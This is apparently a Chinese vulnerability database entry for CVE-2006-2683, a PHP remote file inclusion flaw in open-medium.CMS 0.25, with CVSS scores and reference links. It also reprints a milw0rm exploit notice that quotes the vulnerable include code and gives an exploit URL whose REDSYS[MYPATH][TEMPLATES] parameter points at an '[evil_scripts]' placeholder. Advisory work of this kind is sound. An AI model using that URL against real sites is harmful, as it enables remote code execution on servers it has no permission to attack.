CVE-2006-2683
CVSS6.4
发布时间 :2006-05-31 06:06:00
修订时间 :2011-03-07 21:36:46
NMCOE    

[原文]PHP remote file inclusion vulnerability in 404.php in open-medium.CMS 0.25 allows remote attackers to execute arbitrary PHP code via a URL in the REDSYS[MYPATH][TEMPLATES] parameter.


[CNNVD]open-medium.CMS 0.25 404.php PHP远程文件包含漏洞(CNNVD-200605-583)

        open-medium.CMS 0.25 中的 404.php 存在PHP远程文件包含漏洞,远程攻击者利用URL中的REDSYS[MYPATH][TEMPLATES]参数执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2683
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2683
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-583
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1977
(UNKNOWN)  VUPEN  ADV-2006-1977
http://secunia.com/advisories/20301
(VENDOR_ADVISORY)  SECUNIA  20301
http://milw0rm.com/exploits/1824
(UNKNOWN)  MILW0RM  1824
http://xforce.iss.net/xforce/xfdb/26773
(UNKNOWN)  XF  openmedium-404-file-include(26773)

- 漏洞信息

open-medium.CMS 0.25 404.php PHP远程文件包含漏洞
中危 未知
2006-05-31 00:00:00 2006-05-31 00:00:00
远程  
        open-medium.CMS 0.25 中的 404.php 存在PHP远程文件包含漏洞,远程攻击者利用URL中的REDSYS[MYPATH][TEMPLATES]参数执行任意PHP代码。

- 公告与补丁

        

- 漏洞信息 (1824)

open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability (EDBID:1824)
php webapps
2006-05-25 Verified
0 Kacper
N/A [点击下载]
################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
##################################################################
[code]
404.php:

.......

} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}

?>

[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]


###################################################################
#Elo ;-)

# milw0rm.com [2006-05-25]
		

- 漏洞信息

25832
open-medium.CMS 404.php Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-25 Unknow
2006-05-25 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站